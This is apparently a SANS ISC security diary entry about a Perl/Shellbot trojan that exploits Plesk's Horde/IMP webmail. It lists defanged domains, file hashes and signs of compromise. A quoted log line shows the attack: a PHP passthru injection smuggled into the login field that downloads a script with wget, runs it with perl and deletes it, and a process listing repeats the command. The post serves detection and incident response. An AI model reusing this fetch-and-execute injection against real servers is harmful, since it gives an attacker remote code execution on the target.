Active Perl/Shellbot Trojan

Published: 2013-10-26
Last Updated: 2013-10-26 23:55:43 UTC
by Guy Bruneau (Version: 2)
2 comment(s)

ISC received a submission from Zach of a Perl/Shellbot.B trojan served by fallencrafts[.]info/download/himad.png[1]. The trojan has limited detection on Virustotal [2] and the script contains a “hostauth” of sosick[.]net[3] and the IRC server where the compromised systems are connecting to is located at What we have so far, it appears it is exploiting older version of Plesk.


This Bot exploit a vulnerability in Horde/IMP Plesk webmail, you might want to review system logs for signs of the server attempting to connect outbound to fallencrafts[.]info which appears to be exploiting a Plesk [4] vulnerability and maybe other to connect to which a lot of activity has been reported to DShield for the past 3 days.

Oct 26 11:58:33 HORDE [error] [imp] FAILED LOGIN to localhost:143[imap/notls] as <?php passthru("cd /var/tmp;cd /var/tmp;wget;perl himad.png;rm -rf himad.png*"); ?> [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]

If a system is compromised, you are likely going to see similar Apache processes:

apache   10760  0.0  0.0  10816  1084 ?        S    11:09   0:00 sh -c cd /var/tmp;cd /var/tmp;wget;perl himad.png;rm -rf himad.png*
apache   10761  0.0  0.0  42320  1392 ?        S    11:09   0:00 wget

md5: bca0b2a88338427ba2e8729e710122cd  himad.png
sha-256: 07f968e3996994465f0ec642a5104c0a81b75b0b0ada4005c8c9e3cfb0c51ff9  himad.png



Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

2 comment(s)


Diary Archives